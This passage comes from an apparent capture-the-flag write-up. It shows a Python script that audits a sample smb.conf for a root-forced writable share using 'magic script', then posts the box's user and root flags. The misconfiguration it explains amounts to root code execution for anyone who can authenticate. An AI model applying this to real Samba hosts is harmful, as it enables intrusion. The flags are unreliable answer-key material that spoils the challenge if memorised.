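hosts allow = 0.0.0.0/0
guest ok = no
browseable = yes
writable = no
valid users = emre, asli

[internal]
comment = "zurrak internal share"
path = /opt/internal
hosts allow = 127.0.0.1
guest ok = no
browseable = yes
writable = yes
valid users = emre
create mask = 0777
directory mask = 0777
force user = root
magic script = emergency.sh
"""

Share = Dict[str, str]
Finding = Tuple[str, str, str]  # (share name, finding code, explanation)


def parse_smb_conf(text: str) -> Dict[str, Share]:
    """smb.conf is INI-like, so the standard-library parser handles it.
    Interpolation is off because '%' macros such as %U are common in Samba."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   delimiters=("=",))
    cp.read_string(text)
    return {section: dict(cp[section]) for section in cp.sections()}


def _yes(value: str) -> bool:
    return value.strip().lower() in ("yes", "true", "1")


def is_writable(share: Share) -> bool:
    """Samba accepts several synonyms; the default is read-only."""
    if "read only" in share:
        return not _yes(share["read only"])
    for key in ("writable", "writeable", "write ok"):
        if key in share:
            return _yes(share[key])
    return False


def audit(shares: Dict[str, Share]) -> List[Finding]:
    findings: List[Finding] = []
    for name, opts in shares.items():
        if name.lower() in ("global", "ipc$"):
            continue
        forced = opts.get("force user", "").strip()
        magic = opts.get("magic script", "").strip()
        hosts = opts.get("hosts allow", "").strip()
        if forced == "root" and is_writable(opts):
            findings.append((name, "ROOT_WRITABLE",
                             "writable share with 'force user = root': every file "
                             "uploaded is created on disk as root"))
        if magic:
            runs_as = forced or "the connecting user"
            findings.append((name, "MAGIC_SCRIPT",
                             f"'magic script = {magic}': smbd executes an uploaded "
                             f"{magic} as {runs_as} when the client closes it"))
        if hosts == "127.0.0.1" and (magic or forced):
            findings.append((name, "LOCAL_ONLY",
                             f"reachable only from 127.0.0.1 as {opts.get('valid users', '?')}: "
                             "needs a foothold on the host plus valid Samba credentials"))
    return findings


if __name__ == "__main__":
    for share, code, why in audit(parse_smb_conf(SMB_CONF)):
        print(f"[{code}] {share}: {why}")
```

Run against the excerpt it reports nothing for `[share]` (read-only, no forced user) and three findings for `[internal]`. On a real host, point `SMB_CONF` at the contents of `/etc/samba/smb.conf` (and any `include =` files) and treat `ROOT_WRITABLE` plus `MAGIC_SCRIPT` on the same share as a root-equivalent for anyone who can authenticate to it.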

Logging in would finish it, but the password is wrong.

[Figures 58-59]

Ugh, stuck here, this is unbearable.

[Figure 60]

Finally done; this box was fun.

userflag:fe8f97f109ceb0362c95e60338c4c1a8

rootflag:66fce7650a88ac2afd99d061e1c6a4df

This post is licensed under CC BY 4.0 by the author.